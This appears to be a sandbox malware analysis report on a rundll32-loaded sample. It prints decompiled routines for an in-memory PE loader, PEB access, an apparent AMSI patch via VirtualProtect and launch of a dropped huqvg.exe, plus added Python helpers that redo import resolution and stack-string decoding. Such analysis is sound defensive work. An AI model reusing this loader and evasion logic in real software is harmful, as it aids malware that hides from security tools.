    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
    							} else {                                                                 // thunks from the INT, results into the IAT (+0x10 = FirstThunk)
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4));
    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
    							}
    							L12:
    							while( *( *(_t179 - 8)) != 0) {
    								if(( *( *(_t179 - 8)) & 0x80000000) == 0) {                          // import by name: IMAGE_IMPORT_BY_NAME, +2 skips the hint
    									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8));
    									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77);   // getProcAddress(handle, name, userdata)
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118;
    								} else {                                                             // import by ordinal (low 16 bits)
    									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
    								}
    								L16:
    								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
    									L18:
    									L11:
    									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]);
    									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4;
    									continue;
    								} else {
    									L17:
    									 *((intOrPtr*)(_t179 - 0x18)) = 0;                                // unresolved export
    								}
    								break;
    							}
    							L19:
    							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
    								L21:
    								continue;
    							} else {
    								L20:
    								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87);       // freeLibrary(handle, userdata)
    								SetLastError(0x7f);                                                  // ERROR_PROC_NOT_FOUND
    							}
    						} else {
    							L6:
    							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25);           // freeLibrary(handle, userdata)
    							SetLastError(0xe);                                                       // ERROR_OUTOFMEMORY
    							 *((intOrPtr*)(_t179 - 0x18)) = 0;
    						}
    					} else {
    						L4:
    						SetLastError(0x7e);                                                          // ERROR_MOD_NOT_FOUND
    						 *((intOrPtr*)(_t179 - 0x18)) = 0;
    					}
    					break;
    				}
    				L22:
    				_t95 =  *((intOrPtr*)(_t179 - 0x18));
    				return _t95;
    			}
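
    The loop above is the import-resolution step of the in-memory loader: walk 0x14-byte descriptors until the Name field is zero, load each DLL, then fill the IAT from the INT (or from the IAT itself when OriginalFirstThunk is zero), treating entries with bit 31 set as ordinals and the rest as hint/name pairs. The following is an added example written for this report, not code from the sample or the MemoryModule project. It runs the same walk over a constructed 256-byte image (not bytes from 4123.dll) whose single descriptor imports WSAStartup from ws2_32.dll by name and one export by ordinal; the `modules` dict and its addresses are constructed and stand in for the loadLibrary/getProcAddress callbacks.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000      # the "& 0x80000000" test in the thunk loop
IMPORT_DESCRIPTOR_SIZE = 0x14          # outer loop stride
ERROR_MOD_NOT_FOUND = 0x7E             # SetLastError values seen in the routine
ERROR_PROC_NOT_FOUND = 0x7F


def read_cstring(image, rva):
    end = image.index(b"\0", rva)
    return image[rva:end].decode("ascii")


def build_import_table(image, import_dir_rva, modules):
    """Resolve every import as the decompiled loop does and patch the IAT in place.

    `image` is a bytearray holding a mapped image with base 0 (RVAs are offsets).
    `modules` maps lower-case DLL name -> {export name or ordinal: address} and stands
    in for the loadLibrary/getProcAddress callbacks reached through the module record.
    Returns (win32_error, [(dll, name_or_ordinal, address), ...]); 0 means success.
    """
    resolved = []
    off = import_dir_rva
    # IsBadReadPtr(desc, 0x14) in the sample; here a plain bounds check
    while off + IMPORT_DESCRIPTOR_SIZE <= len(image):
        original_first_thunk, _, _, name_rva, first_thunk = struct.unpack_from("<5I", image, off)
        if name_rva == 0:                          # all-zero terminator descriptor
            break
        dll = read_cstring(image, name_rva).lower()
        exports = modules.get(dll)
        if exports is None:
            return ERROR_MOD_NOT_FOUND, resolved
        thunk_ref = original_first_thunk or first_thunk   # no INT: walk the IAT for the names
        iat = first_thunk
        while True:
            entry, = struct.unpack_from("<I", image, thunk_ref)
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                key = entry & 0xFFFF                       # import by ordinal
            else:
                key = read_cstring(image, entry + 2)       # skip the 2-byte hint
            address = exports.get(key)
            if address is None:
                return ERROR_PROC_NOT_FOUND, resolved
            struct.pack_into("<I", image, iat, address)    # write the resolved pointer into the IAT
            resolved.append((dll, key, address))
            thunk_ref += 4
            iat += 4
        off += IMPORT_DESCRIPTOR_SIZE
    return 0, resolved


def read_iat(image, rva, count):
    return struct.unpack_from("<%dI" % count, image, rva)


def sample_image():
    """Constructed 256-byte image: one descriptor for ws2_32.dll importing WSAStartup by
    name and ordinal 3, followed by the zero terminator. Not bytes from the sample."""
    img = bytearray(0x100)
    struct.pack_into("<5I", img, 0x00, 0x40, 0, 0, 0x80, 0x60)          # descriptor; 0x14 stays zero
    struct.pack_into("<3I", img, 0x40, 0x90, IMAGE_ORDINAL_FLAG32 | 3, 0)  # INT
    struct.pack_into("<3I", img, 0x60, 0x90, IMAGE_ORDINAL_FLAG32 | 3, 0)  # IAT (overwritten)
    img[0x80:0x8B] = b"ws2_32.dll\0"
    img[0x90:0x9D] = b"\0\0WSAStartup\0"                                 # hint + name
    return img


FAKE_EXPORTS = {"ws2_32.dll": {"WSAStartup": 0x77A01000, 3: 0x77A02000}}   # constructed addresses
```

    Because the IAT is written in place, the same function applied to a memory dump of the unpacked image (with base 0x11B0000 subtracted from the RVAs) recovers the list of APIs the payload resolved, which is a quicker way to get its import set than reading each GetProcAddress call in the trace.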

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011B191C
    • SetLastError.KERNEL32(0000007E), ref: 011B195E
    • SetLastError.KERNEL32(0000000E), ref: 011B19AE
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: da4165bacb9bd278e740ca1032047d8c07ed4ff9b8cd0d33d95c14ae5002f22c
    • Instruction ID: 54cfb6acd1bf6337dfeb2db97a149875da28369c9a667a441de06af87c2c3e68
    • Opcode Fuzzy Hash: da4165bacb9bd278e740ca1032047d8c07ed4ff9b8cd0d33d95c14ae5002f22c
    • Instruction Fuzzy Hash: 98011D71A00108EFDB18DFA4D585BAEB7B1FF48314F218158E905AB241C774EF90DB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph (interactive graph not reproduced): blocks 11a1d10-11a1e74; VirtualProtect at 11a1e3c; calls to 11a1820 and 11a1b20.
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5eaec03bfe33be913e40b4d6c8c93c7847f10b67c1659da54f6249096d699e24
    • Instruction ID: 0c3518607d6ae71a9287cf0a7487b8fe6681663824503604fb436f1963bd5423
    • Opcode Fuzzy Hash: 5eaec03bfe33be913e40b4d6c8c93c7847f10b67c1659da54f6249096d699e24
    • Instruction Fuzzy Hash: 4541FC78A00109EFEB09DF48C494BAEBBB2FB88314F54C559E9195F355D771EA82CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E011B1AF0(void* __ecx, CHAR* _a4) {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _t6;
    
    				_t6 = LoadLibraryA(_a4); // executed
    				_v8 = _t6;
    				if(_v8 != 0) {
    					return _v8;
    				}
    				return 0;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 011B1AF8
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 1bb7ffc7889322aa7283c83199a8009e4f25475c4482445f13e6aeaf3c97e6f8
    • Instruction ID: b57cd42f40597a63bc606970604dbfbd5123ebc641ed814a5a5fa91b2367d1be
    • Opcode Fuzzy Hash: 1bb7ffc7889322aa7283c83199a8009e4f25475c4482445f13e6aeaf3c97e6f8
    • Instruction Fuzzy Hash: 03D09E7491920CFBCB14DEA5E68859977B8EB08251F1145A4F80993200E6319A909A91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E011B1140(void* __ecx, long _a4) {
    				void* _v8;
    				void* _t5;
    
    				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE
    				_v8 = _t5;
    				return _v8;
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011B11A1,00003000,00000004,00000004,?,011B11A1,?), ref: 011B1151
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 13125dde12cde95e26db7df42fdca15dc8a8d56d36e7f1c8b324e6d67da0d987
    • Instruction ID: 425663991492c76840f69d1672238fb68a6ee2cfce811e9e83892b0b8100a080
    • Opcode Fuzzy Hash: 13125dde12cde95e26db7df42fdca15dc8a8d56d36e7f1c8b324e6d67da0d987
    • Instruction Fuzzy Hash: 10D0C97464520CBBE714CA84D846F69BBACEB08611F000194FE089B280D5B16E504791
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011A1A51,00003000,00000004,000000BE,?,011A1A51,?), ref: 011A1A01
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 8af300f66a45cc092db8a04f4baf019053ae5a84ee445cd1114e4bb4d5df2117
    • Instruction ID: 31ecfcd4b12ff572d31c6bd0c8a716626774005b8e674bf7e369de8b9929488a
    • Opcode Fuzzy Hash: 8af300f66a45cc092db8a04f4baf019053ae5a84ee445cd1114e4bb4d5df2117
    • Instruction Fuzzy Hash: 92D0C9B4685208BBE714CA84D906F69BBACE704611F004195FE089B280D5B1AE4057A1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 011A182F
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 344d0fefa3c7fec75bcd668203267a1e8cab9ae10a215e37755925135b7d2955
    • Instruction ID: 0736e211c1fc02c10101884e39eb60a24bef8ddd5788d0fc399ac8bfb5e81b09
    • Opcode Fuzzy Hash: 344d0fefa3c7fec75bcd668203267a1e8cab9ae10a215e37755925135b7d2955
    • Instruction Fuzzy Hash: 21C04C7615430CAB8B04DFD8E884DAB77ADBB8C610B448518BA2D87204D630F9508BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • LoadLibraryW.KERNEL32(ntdll.dll,ZwOpenSymbolicLinkObject,?,10001538), ref: 1000110B
    • GetProcAddress.KERNEL32(00000000), ref: 10001112
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: ZwOpenSymbolicLinkObject$ntdll.dll
    • API String ID: 2574300362-2262421573
    • Opcode ID: b2162f11516302f4d5eca71e37eee3ebe81cc0872da632586161b8f1b77e2212
    • Instruction ID: bd841c76cede78a1409b9bf46fadacf407521c95edff58667da74993b579616d
    • Opcode Fuzzy Hash: b2162f11516302f4d5eca71e37eee3ebe81cc0872da632586161b8f1b77e2212
    • Instruction Fuzzy Hash: BCE05E317D433176F62063B46C8AFD62A48CB04BD2F004051F705DD0CCDA90584146A4
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
    • Instruction ID: 0cda09408262def4873953c3571786d522269c13ba336bc99f64b46f3268d781
    • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
    • Instruction Fuzzy Hash: 87F10DB4A01209EFDB08CF94C994AAEB7B5FF8C304F108598E906AB345D775EE51CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
    • Instruction ID: e0da16a10d727cb128dc24db98cdf74a47656ced7dec16e3925e45524e7ca01a
    • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
    • Instruction Fuzzy Hash: B0319136A0474A8FD724DF1CC48092AB7E8FF8D314F0A09ADFA9587312D735E9568B91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Reads the PEB pointer out of the TEB; this is the behaviour behind the
    			// "Contains functionality to read the PEB" signature.
    			E100010E0(void* __ecx) {
    				intOrPtr _v8;
    
    				_v8 =  *[fs:0x30];   // TEB->ProcessEnvironmentBlock
    				return _v8;
    			}

    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
    • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011A14DB
    • SetLastError.KERNEL32(0000007F), ref: 011A1507
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: e518a0573dee779e6da20ee5b463e3dc2bd7241a3e78d72a128c378984eddfda
    • Instruction ID: 25e1238ce0b13edbc828a22c36c95ab2a18f1124bbe3567ab6e5b6a3899cda11
    • Opcode Fuzzy Hash: e518a0573dee779e6da20ee5b463e3dc2bd7241a3e78d72a128c378984eddfda
    • Instruction Fuzzy Hash: 72710978E44109EFCB08DF98C580AADBBB2FF49304FA58598D416AB345D774EA81CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			// Starts the dropped binary. The two indirect calls go through import
    			// pointers the dump does not name; their argument layouts match memset
    			// (dest, 0, size) and CreateProcessA (10 arguments, STARTUPINFOA.cb = 0x44,
    			// PROCESS_INFORMATION of 0x10 bytes, current directory "C:\"). This is an
    			// analyst inference from the arguments, not a resolved import.
    			E048512B0() {
    				signed int _v8;
    				void _v40;
    				void* _v52;
    				void* _v56;
    				char _v124;
    				int _t23;
    				void* _t32;
    				void* _t37;
    				signed int _t40;
    
    				_v8 =  *0x4853004 ^ _t40;                                          // stack cookie
    				 *0x4853028( &_v124, 0, 0x44, _t32, _t37);                          // memset(&si, 0, sizeof(STARTUPINFOA))
    				 *0x4853028( &_v56, 0, 0x10);                                      // memset(&pi, 0, sizeof(PROCESS_INFORMATION))
    				_v124 = 0x44;                                                      // si.cb
    				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);         // 28 bytes via rep movsd ...
    				asm("movsw");                                                      // ... + 2
    				asm("movsb");                                                      // ... + 1 = 31 bytes, the path plus its NUL
    				 *0x4853018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56);     // CreateProcessA(path, NULL, NULL, NULL, FALSE, 0, NULL, "C:\", &si, &pi); result not checked
    				CloseHandle(_v56);                                                 // pi.hProcess
    				_t23 = CloseHandle(_v52);                                          // pi.hThread
    				E04851A04();                                                       // cookie check
    				return _t23;
    			}
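
    Two details in E04851040 and E048512B0 are easy to misread in decompiler output: the directory name is assembled from 32-bit immediates (the decompiler prints a full string literal beside each 4-byte store), and the executable path is copied with `rep movsd` followed by `movsw` and `movsb`, whose sizes must be added up to see that the copy covers exactly the path and its terminator. The block below is an added example for this report, not code from the sample: it reassembles the stack string from the immediates shown on the page, checks the movs size arithmetic, and computes the 32-bit STARTUPINFOA and PROCESS_INFORMATION sizes that identify the 0x44 and 0x10 memset arguments. The immediates are the ones printed in the decompiled listing; no other input is taken from the sample.

```python
import struct


def decode_stack_string(dwords):
    """Reassemble a string written to the stack as 32-bit immediates, in store order.
    The decompiler printed one such immediate beside each store in E04851040."""
    raw = b"".join(struct.pack("<I", d) for d in dwords)
    return raw.split(b"\0", 1)[0].decode("ascii")


def encode_stack_string(text):
    """Inverse: the dword immediates a compiler emits for `text` plus its NUL, padded to 4."""
    raw = text.encode("ascii") + b"\0"
    raw += b"\0" * (-len(raw) % 4)
    return list(struct.unpack("<%dI" % (len(raw) // 4), raw))


def movs_split(nbytes):
    """How an inlined copy of nbytes is split into rep movsd / movsw / movsb."""
    return nbytes // 4, (nbytes % 4) // 2, nbytes % 2


def movs_total(dwords, words, bytes_):
    """Bytes moved by the three-instruction sequence (7 << 2 dwords, movsw, movsb in E048512B0)."""
    return 4 * dwords + 2 * words + bytes_


def startupinfoa_size():
    """32-bit STARTUPINFOA: cb, lpReserved, lpDesktop, lpTitle, 8 DWORD geometry/flag fields,
    wShowWindow, cbReserved2, lpReserved2, hStdInput, hStdOutput, hStdError."""
    return struct.calcsize("<4I8I2H4I")


def process_information_size():
    """32-bit PROCESS_INFORMATION: hProcess, hThread, dwProcessId, dwThreadId."""
    return struct.calcsize("<4I")


# The immediates printed beside the stores in E04851040 (0x4852110/0x4852114 hold the last two)
E04851040_IMMEDIATES = [0x505C3A43, 0x72676F72, 0x61446D61, 0x685C6174, 0x67767175, 0x0]
DROPPED_EXE_PATH = "C:\\ProgramData\\huqvg\\huqvg.exe"
```

    With the path length 30 plus the terminator, movs_split(31) returns (7, 1, 1), matching the `7 << 2` dword copy and the trailing movsw/movsb, and the two calcsize results equal the 0x44 and 0x10 passed to the zeroing call, which is what supports reading the ten-argument indirect call as CreateProcessA.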

    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: 84bd75b90bafa31c8a28a658541f8392a55ff0dc385e7ef02cd218c42367b373
    • Instruction ID: 544cb704eaff4a1e63d369a4b581158db99bd0ff7805c69bee5d0cbb219b1a17
    • Opcode Fuzzy Hash: 84bd75b90bafa31c8a28a658541f8392a55ff0dc385e7ef02cd218c42367b373
    • Instruction Fuzzy Hash: 5A016D71A00308ABDB10FBA4D849FDE7B7DEB48714F500958FA09A7180DA796E08CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LoadLibraryExA.KERNEL32(011A4070,00000000,00000800), ref: 011A25F9
    • GetProcAddress.KERNEL32(00000000,011A4078), ref: 011A2615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 011A2650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 011A2671
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: 6b93b809a0a998f89a62662b41f4dceb096ae9ce2e423d2b12969b753269a3f0
    • Instruction ID: 19ccef383f17fad157b45b6b3cb7de53d84c3863793bcfc0f5c9296d4c0127dc
    • Opcode Fuzzy Hash: 6b93b809a0a998f89a62662b41f4dceb096ae9ce2e423d2b12969b753269a3f0
    • Instruction Fuzzy Hash: 79111CB8E41209EFCB18CFD4C945BAEBBB4FB48300F504559EA1667340D7B46A44DB55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetProcAddress.KERNEL32(?), ref: 011644DA
    • GetProcAddress.KERNEL32(?), ref: 011644E4
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: D$dll
    • API String ID: 190572456-2257804249
    • Opcode ID: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction ID: 8aa7bb8960234ad2bffdced2c225c7995ecf775a5db68c4040c37f83c144f16d
    • Opcode Fuzzy Hash: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction Fuzzy Hash: F8018071900218BBEB14EBA4CC99FDF7B7DEB48704F104018FB05A7185DB756A08CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Export lookup over a manually mapped module (same logic as MemoryModule's
    			// MemoryGetProcAddress): _a4 is the module record ([0] = NT headers, [4] = mapped
    			// base), _a8 is lpProcName (a string when HIWORD != 0, otherwise an ordinal).
    			// Every failure path sets 0x7f = ERROR_PROC_NOT_FOUND.
    			E011B1FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    				signed short* _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _t82;
    				void* _t124;
    
    				_v40 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v12 =  *_t3; // mapped image base
    				_v16 = 0;
    				_v32 =  *_a4 + 0x78; // OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
    				if( *((intOrPtr*)(_v32 + 4)) != 0) { // export directory Size != 0
    					_v8 = _v12 +  *_v32; // IMAGE_EXPORT_DIRECTORY
    					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) { // NumberOfNames, NumberOfFunctions
    						SetLastError(0x7f);
    						return 0;
    					} else {
    						if((_a8 >> 0x00000010 & 0xffff) != 0) { // HIWORD(lpProcName) != 0: look up by name
    							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20)); // AddressOfNames
    							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24)); // AddressOfNameOrdinals
    							_v36 = 0;
    							_v20 = 0;
    							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) { // linear scan of the name table
    								_t82 = E011B11E0(_a8, _v12 +  *_v24); // string compare, 0 on match
    								_t124 = _t124 + 8;
    								if(_t82 != 0) {
    									_v20 = _v20 + 1;
    									_v24 = _v24 + 4;
    									_v28 =  &(_v28[1]);
    									continue;
    								}
    								_v16 =  *_v28 & 0x0000ffff; // ordinal index of the matching name
    								_v36 = 1;
    								break;
    							}
    							if(_v36 != 0) {
    								L17:
    								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) { // note: <= admits idx == NumberOfFunctions, one slot past the table
    									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4)); // base + AddressOfFunctions[idx]
    								}
    								SetLastError(0x7f);
    								return 0;
    							}
    							SetLastError(0x7f);
    							return 0;
    						}
    						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) { // ordinal lookup: LOWORD(lpProcName) >= Base
    							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10)); // index = ordinal - Base
    							goto L17;
    						}
    						SetLastError(0x7f);
    						return 0;
    					}
    				}
    				SetLastError(0x7f);
    				return 0;
    			}














    0x011b1fa6
    0x011b1fac
    0x011b1faf
    0x011b1fb2
    0x011b1fca
    0x011b1fd4
    0x011b1fed
    0x011b1ff7
    0x011b2004
    0x00000000
    0x011b2011
    0x011b2021
    0x011b2069
    0x011b2075
    0x011b2078
    0x011b207f
    0x011b20a3
    0x011b20bb
    0x011b20c0
    0x011b20c5
    0x011b208e
    0x011b2097
    0x011b20a0
    0x00000000
    0x011b20a0
    0x011b20cd
    0x011b20d0
    0x00000000
    0x011b20d0
    0x011b20df
    0x011b20ed
    0x011b20f6
    0x00000000
    0x011b2113
    0x011b20fa
    0x00000000
    0x011b2100
    0x011b20e3
    0x00000000
    0x011b20e9
    0x011b2035
    0x011b2058
    0x00000000
    0x011b2058
    0x011b2039
    0x00000000
    0x011b203f
    0x011b1ff7
    0x011b1fd8
    0x00000000

    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011B1039,00000000), ref: 011B1FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011B1039,00000000), ref: 011B2004
